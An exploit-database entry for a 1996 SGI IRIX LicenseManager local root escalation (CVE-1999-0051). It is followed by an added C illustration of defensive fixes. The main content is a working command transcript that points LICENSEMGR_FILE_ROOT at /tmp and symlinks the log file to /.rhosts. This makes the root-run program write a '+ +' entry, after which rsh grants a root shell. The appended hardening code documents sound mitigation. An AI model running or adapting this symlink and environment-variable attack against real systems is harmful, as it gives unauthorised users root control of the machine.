SGI IRIX 6.4 / SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - 'LICENSEMGR_FILE_ROOT' Local Privilege Escalation
Author: Yuri Volobuev
type: local
platform: irix
date_added: 1996-11-22
date_updated: 2017-11-16
verified: 1
codes: OSVDB-897;CVE-1999-0051
source: https://www.securityfocus.com/bid/73/info
Under normal operation, LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to arbitrarily manipulate root-owned files, allowing root access.
% mkdir -p /tmp/var/flexlm
% setenv LICENSEMGR_FILE_ROOT /tmp
% cd /tmp/var/flexlm
% cat > license.dat
#
# FLEXlm license file
#
FEATURE + + blah sgifd 1.00 01-jan-0 0 blah
^D
% ln -s /.rhosts license.dat.log
% LicenseManager &
Next click on Update, fill in the four fields with any information and click
on Apply. LicenseManager will report an error. Ignore it and exit.
% cat /.rhosts
Checkpoint file /var/flexlm/license.dat Fri Nov 22 19:05:50 1996
#
# FLEXlm license file
#
FEATURE + + blah sgifd 1.00 01-jan-0 0 blah
% rsh localhost -l root
#
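
A defensive counterpart to the transcript above, added here as an illustration; it is not part of the original advisory and is not SGI's code. It assumes, as the transcript indicates, that LicenseManager runs with root privileges, takes its file root from LICENSEMGR_FILE_ROOT, and appends to license.dat.log through a symlink; the names choose_root and open_checkpoint_log are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: decide whether an environment-supplied file root
 * may be used. If real and effective UID differ, the process holds
 * privileges its caller lacks, so the caller's override is ignored. */
const char *choose_root(const char *env_root, uid_t ruid, uid_t euid)
{
    if (env_root == NULL || ruid != euid)
        return "";              /* fall back to the built-in /var/flexlm tree */
    return env_root;
}

/* Hypothetical helper: open the checkpoint log for append. O_NOFOLLOW
 * rejects a symlink as the final path component; fstat() on the descriptor
 * confirms a regular, singly linked file owned by the expected user. */
int open_checkpoint_log(const char *path, uid_t owner)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;              /* errno is ELOOP for a symlink on Linux */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != owner) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

int main(void)
{
    char path[4096];
    const char *root = choose_root(getenv("LICENSEMGR_FILE_ROOT"),
                                   getuid(), geteuid());
    snprintf(path, sizeof path, "%s/var/flexlm/license.dat.log", root);
    int fd = open_checkpoint_log(path, geteuid());
    if (fd < 0)
        perror(path);
    else
        close(fd);
    return fd < 0;
}
```

O_NOFOLLOW checks only the last path component, so it does not help while the directory itself is chosen by the caller; that is why the environment override is dropped whenever the process is privileged.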